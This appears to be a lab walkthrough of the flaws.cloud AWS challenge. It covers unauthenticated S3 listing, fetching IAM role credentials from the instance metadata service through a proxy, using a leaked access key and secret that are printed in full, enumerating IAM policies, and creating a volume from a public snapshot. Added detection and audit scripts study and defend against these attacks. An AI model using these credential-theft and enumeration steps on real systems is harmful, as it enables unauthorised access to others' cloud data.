Using a vulnerable lab environment available online, I looked into the security problems that arise when an AWS S3 bucket is misconfigured, including unauthenticated access and leaked access keys.
Introduction
Amazon S3 is a public service that web application developers can use to store digital assets such as images, video, music and documents. S3 exposes a RESTful API for interacting with the service programmatically.
Lab environment
Information gathering
Identify the hosting server
```
# nslookup 54.231.184.255
255.184.231.54.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
```
Accessible at: http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
Unauthenticated access
```
aws s3 ls s3://flaws.cloud --no-sign-request --region us-west-2
```
```
http://flaws.cloud.s3.amazonaws.com/
```
```
aws s3 --profile YOUR_ACCOUNT ls s3://level2.flaws.cloud
```
Download a single file
```
aws s3 cp s3://flaws.cloud/secret.html /home --no-sign-request --region us-west-2
```
Download all files
```
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
```
The four S3 bucket permissions
```
List, Upload/Delete, View Permissions, Edit Permissions
```
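The anonymous `aws s3 ls --no-sign-request` listing above works because the bucket ACL grants `READ` to the `AllUsers` group. As an added example (not part of the original post), the script below maps the grants returned by `aws s3api get-bucket-acl` onto the four permissions just listed and reports which of them are open to everyone. The ACL JSON is constructed to mirror the CLI's output shape; the owner ID is a placeholder.

```python
"""Added example: map S3 ACL grants onto List / Upload/Delete /
View Permissions / Edit Permissions and report public exposure.
The sample ACL is constructed, not captured from a real bucket."""
import json

# Group URIs S3 uses for "everyone" and "any AWS account".
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

# ACL permission -> the console-level permission named in the post.
ACL_TO_CONSOLE = {
    "READ": "List",
    "WRITE": "Upload/Delete",
    "READ_ACP": "View Permissions",
    "WRITE_ACP": "Edit Permissions",
}

# Constructed sample in the shape of `aws s3api get-bucket-acl --bucket <name>`.
SAMPLE_ACL = json.loads("""
{
  "Owner": {"DisplayName": "example-owner", "ID": "EXAMPLEOWNERID"},
  "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLEOWNERID"},
     "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group",
                 "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
    {"Grantee": {"Type": "Group",
                 "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
     "Permission": "READ_ACP"}
  ]
}
""")


def public_grants(acl):
    """Return {"AllUsers": set, "AuthenticatedUsers": set} of console-level
    permissions each public group holds. FULL_CONTROL expands to all four."""
    result = {"AllUsers": set(), "AuthenticatedUsers": set()}
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue  # a named account is not "public"
        uri = grantee.get("URI")
        if uri == ALL_USERS:
            key = "AllUsers"
        elif uri == AUTHENTICATED_USERS:
            key = "AuthenticatedUsers"
        else:
            continue  # e.g. the LogDelivery group
        perm = grant.get("Permission")
        if perm == "FULL_CONTROL":
            result[key].update(ACL_TO_CONSOLE.values())
        elif perm in ACL_TO_CONSOLE:
            result[key].add(ACL_TO_CONSOLE[perm])
    return result


def findings(acl):
    """Human-readable findings. 'AllUsers has List' is exactly the condition
    that lets an unsigned `aws s3 ls` enumerate the bucket."""
    out = []
    for group, perms in public_grants(acl).items():
        for perm in sorted(perms):
            out.append(f"{group} has {perm}")
    return out


if __name__ == "__main__":
    for line in findings(SAMPLE_ACL):
        print(line)
```

`AuthenticatedUsers` means any AWS account, not just accounts in the bucket owner's organisation, so a grant to that group should be treated as public. In practice this check belongs alongside the account-level Block Public Access setting, which overrides public ACL grants regardless of what the ACL says.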
Retrieving instance metadata through an available proxy
```
curl http://169.254.169.254/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
```
```
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
```
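The `/proxy/169.254.169.254/` requests above leave a clear trace in the web server's access log. As an added example (not part of the original post), this detection scans combined-format access log lines for requests that target the instance metadata service through the application and separates plain metadata reads from reads of the role-credential path. The log lines, client IPs and timestamps are constructed.

```python
"""Added example: flag web requests that reach the EC2 instance metadata
service (IMDS) through an application-level proxy. Log lines are constructed."""
import re
from urllib.parse import unquote

# IMDS endpoints: the IPv4 link-local address and its IPv6 equivalent.
IMDS_HOSTS = ("169.254.169.254", "fd00:ec2::254")
# Path under which IMDS serves temporary role credentials.
CRED_PATH = "/latest/meta-data/iam/security-credentials/"

# Minimal combined-log parser: source, timestamp, method, path, status.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /proxy/169.254.169.254/ HTTP/1.1" 200
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ HTTP/1.1" 200
203.0.113.9 - - [10/Mar/2024:10:00:04 +0000] "GET /proxy/169%2E254%2E169%2E254/latest/meta-data/ HTTP/1.1" 200
203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /proxy/example.org/ HTTP/1.1" 200
"""


def classify(path):
    """Return None, "metadata" or "credentials" for one request path.
    Percent-decoding catches the encoded form of the address."""
    decoded = unquote(path).lower()
    if not any(host in decoded for host in IMDS_HOSTS):
        return None
    return "credentials" if CRED_PATH in decoded else "metadata"


def scan(log_text):
    """Return a list of (source_ip, severity, raw_path) for suspicious lines."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue  # unparseable line: skip rather than crash the scan
        severity = classify(match.group("path"))
        if severity:
            hits.append((match.group("src"), severity, match.group("path")))
    return hits


if __name__ == "__main__":
    for src, severity, path in scan(SAMPLE_LOG):
        print(f"{severity:11s} {src:15s} {path}")
```

Detection is the second line of defence here; the first is requiring IMDSv2 on the instance (`aws ec2 modify-instance-metadata-options --http-tokens required --http-put-response-hop-limit 1`), because IMDSv2 only answers requests carrying a session token obtained with a PUT, which a simple GET-forwarding proxy like the one above cannot obtain.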
Key leakage
Leaked keys
```
access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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
```
Connecting to AWS storage with the leaked keys
```
aws configure --profile flaws
```
If a session token is present, add it to the ~/.aws/credentials file as aws_session_token.
```
aws --profile flaws s3 ls
```
A permissions problem shows up as an Access Denied error, in which case you can point the command at a specific bucket; an InvalidAccessKeyId error means the key only works together with a session token.
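Keys leak in exactly the form shown above: an access key ID and a secret sitting side by side in a file, a page or a log. As an added example (not part of the original post), this scanner finds AWS access key IDs in a blob of text, tells long-lived keys (`AKIA...`) apart from temporary ones (`ASIA...`, which only work with an `aws_session_token`), and notes whether a secret-looking value sits nearby. The sample text is constructed; the key values are the placeholder keys AWS uses in its own documentation.

```python
"""Added example: find AWS access key IDs in text and classify them.
The sample text is constructed; AKIAIOSFODNN7EXAMPLE and the matching
secret are AWS documentation placeholders, not live credentials."""
import re

# Access key IDs are 20 chars: a 4-char prefix plus 16 upper-case alphanumerics.
KEY_ID = re.compile(r"(?<![A-Z0-9])(?P<id>(?:AKIA|ASIA)[A-Z0-9]{16})(?![A-Z0-9])")
# Secrets are 40 chars of a base64-like alphabet; require a "secret" label
# within a short distance to keep false positives down.
SECRET = re.compile(
    r"secret[^\n]{0,40}?(?P<secret>[A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])",
    re.IGNORECASE,
)

SAMPLE_TEXT = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# temporary credentials pasted from a debug log
access_key ASIAIOSFODNN7EXAMPLE secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
AKIA on its own is just a word and must not match
"""


def find_keys(text, window=200):
    """Return one dict per key ID found: the ID, whether it is long-lived or
    temporary, and whether a secret-shaped value appears within `window`
    characters after it."""
    found = []
    for match in KEY_ID.finditer(text):
        key = match.group("id")
        kind = ("temporary (needs aws_session_token)" if key.startswith("ASIA")
                else "long-lived")
        nearby = text[match.end(): match.end() + window]
        found.append({
            "key_id": key,
            "kind": kind,
            "secret_nearby": SECRET.search(nearby) is not None,
        })
    return found


if __name__ == "__main__":
    for hit in find_keys(SAMPLE_TEXT):
        print(f"{hit['key_id']}  {hit['kind']}  secret nearby: {hit['secret_nearby']}")
```

The prefix test explains the InvalidAccessKeyId behaviour described above: an `ASIA` key presented without its session token is rejected outright rather than failing with Access Denied. When a scan like this turns up a hit, the response is to rotate the key and check CloudTrail for its use, not to test whether it still works.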
Reading a bucket directly with a low-privilege profile
```
aws --profile lv6 s3 sync s3://flaws.cloud/ .
aws --profile lv6 s3 cp s3://flaws.cloud/robots.txt .
```
Get the account ID
```
# aws --profile flaws sts get-caller-identity
{
    "Account": "975426262029",
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC",
    "Arn": "arn:aws:iam::975426262029:user/backup"
}
```
```
# aws --profile lv6 iam get-user
{
    "User": {
        "UserName": "Level6",
        "Path": "/",
        "CreateDate": "2017-02-26T23:11:16Z",
        "UserId": "AIDAIRMDOSCWGLCDWOG6A",
        "Arn": "arn:aws:iam::975426262029:user/Level6"
    }
}
```
Get the policies attached to a known user name
```
# aws --profile lv6 iam list-attached-user-policies --user-name Level6
{
    "AttachedPolicies": [
        {
            "PolicyName": "list_apigateways",
            "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
        },
        {
            "PolicyName": "MySecurityAudit",
            "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
        }
    ]
}
```
Get the policy's version id
```
# aws --profile lv6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
{
    "Policy": {
        "PolicyName": "list_apigateways",
        "Description": "List apigateways",
        "PermissionsBoundaryUsageCount": 0,
        "CreateDate": "2017-02-20T01:45:17Z",
        "AttachmentCount": 1,
        "IsAttachable": true,
        "PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
        "DefaultVersionId": "v4",
        "Path": "/",
        "Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
        "UpdateDate": "2017-02-20T01:48:17Z"
    }
}
```
With the version id, get the policy's details
```
# aws --profile lv6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
{
    "PolicyVersion": {
        "CreateDate": "2017-02-20T01:48:17Z",
        "VersionId": "v4",
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Action": [
                        "apigateway:GET"
                    ],
                    "Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
                    "Effect": "Allow"
                }
            ]
        },
        "IsDefaultVersion": true
    }
}
```
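The `get-policy-version` output is where a reviewer decides whether a policy is as narrow as the one above or a blanket grant. As an added example (not part of the original post), this audit walks a policy document in that exact shape, prints one line per action/resource pair, and flags Allow statements that use a whole-service action (`svc:*` or `*`), a `*` resource, or negated matchers. The sample embeds the page's `list_apigateways` statement next to a constructed over-broad statement so there is something to flag.

```python
"""Added example: summarize and audit an IAM policy document as returned by
`aws iam get-policy-version`. The second and third statements are constructed."""
import json

SAMPLE_POLICY_VERSION = json.loads("""
{
  "PolicyVersion": {
    "VersionId": "v4",
    "IsDefaultVersion": true,
    "Document": {
      "Version": "2012-10-17",
      "Statement": [
        {"Action": ["apigateway:GET"],
         "Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
         "Effect": "Allow"},
        {"Action": "s3:*", "Resource": "*", "Effect": "Allow"},
        {"Action": ["iam:GetUser"], "Resource": "*", "Effect": "Deny"}
      ]
    }
  }
}
""")


def as_list(value):
    """IAM accepts either a string or a list for Action/Resource/Statement."""
    return value if isinstance(value, list) else [value]


def summarize(doc):
    """One 'Effect action -> resource' line per (action, resource) pair."""
    lines = []
    for statement in as_list(doc.get("Statement", [])):
        for action in as_list(statement.get("Action", [])):
            for resource in as_list(statement.get("Resource", [])):
                lines.append(f"{statement.get('Effect')} {action} -> {resource}")
    return lines


def audit(doc):
    """Return (statement_index, issue, value) tuples for Allow statements that
    grant a whole service, apply to every resource, or use NotAction/NotResource
    (which silently grant everything not listed)."""
    issues = []
    for idx, statement in enumerate(as_list(doc.get("Statement", []))):
        if statement.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        for key in ("NotAction", "NotResource"):
            if key in statement:
                issues.append((idx, "negated matcher", key))
        for action in as_list(statement.get("Action", [])):
            if action == "*" or action.endswith(":*"):
                issues.append((idx, "wildcard action", action))
        for resource in as_list(statement.get("Resource", [])):
            if resource == "*":
                issues.append((idx, "wildcard resource", resource))
    return issues


if __name__ == "__main__":
    document = SAMPLE_POLICY_VERSION["PolicyVersion"]["Document"]
    print("\n".join(summarize(document)))
    for idx, issue, value in audit(document):
        print(f"statement[{idx}]: {issue}: {value}")
```

The page's own statement passes cleanly: `apigateway:GET` on `.../restapis/*` is scoped to one action in one region. Run the same check over every attached and inline policy of a user (the `list-attached-user-policies` output above gives the ARNs) to see the user's effective permissions rather than one policy at a time.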
List the callable functions to obtain their names
```
aws --region us-west-2 --profile level6 lambda list-functions
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
```
Using the stageName, the region and the function name, assemble the full API path.
List snapshots
```
aws --profile flaws ec2 describe-snapshots
aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
```
Create a volume from a snapshot
```
aws --profile YOUR_ACCOUNT ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
```
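A snapshot can be turned into a volume from another account, as above, only when its createVolumePermission attribute is shared with that account or with the `all` group. As an added example (not part of the original post), this check classifies snapshots by that attribute using the shape returned by `aws ec2 describe-snapshot-attribute --attribute createVolumePermission`. The three responses are constructed; the snapshot IDs and the account ID are made up.

```python
"""Added example: classify EBS snapshots as public / shared / private from
constructed `describe-snapshot-attribute` responses."""
import json

# One response per snapshot; the real command is run once per snapshot id.
SAMPLE_ATTRIBUTES = [json.loads(text) for text in (
    '{"SnapshotId": "snap-0000000000000aaaa", '
    '"CreateVolumePermissions": [{"Group": "all"}], "ProductCodes": []}',
    '{"SnapshotId": "snap-0000000000000bbbb", '
    '"CreateVolumePermissions": [{"UserId": "111122223333"}], "ProductCodes": []}',
    '{"SnapshotId": "snap-0000000000000cccc", '
    '"CreateVolumePermissions": [], "ProductCodes": []}',
)]


def exposure(attr):
    """'public' if the all group may create volumes, 'shared' if specific
    accounts may, otherwise 'private'."""
    perms = attr.get("CreateVolumePermissions", [])
    if any(perm.get("Group") == "all" for perm in perms):
        return "public"
    if any("UserId" in perm for perm in perms):
        return "shared"
    return "private"


def report(attrs, allowed_accounts=()):
    """Return {snapshot_id: exposure}. 'shared' becomes 'shared-ok' when every
    account in the grant is on the caller's allow-list."""
    out = {}
    for attr in attrs:
        level = exposure(attr)
        if level == "shared":
            ids = {perm["UserId"] for perm in attr["CreateVolumePermissions"]
                   if "UserId" in perm}
            if ids <= set(allowed_accounts):
                level = "shared-ok"
        out[attr["SnapshotId"]] = level
    return out


if __name__ == "__main__":
    for snapshot_id, level in report(SAMPLE_ATTRIBUTES).items():
        print(f"{snapshot_id}  {level}")
```

Any snapshot reported as `public` should be made private with `aws ec2 modify-snapshot-attribute --attribute createVolumePermission --operation-type remove --group-names all`, and the data on it treated as already disclosed.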
Attaching the volume to an AWS server requires an AWS account; I have not done this yet.
References
https://www.freebuf.com/articles/system/129667.html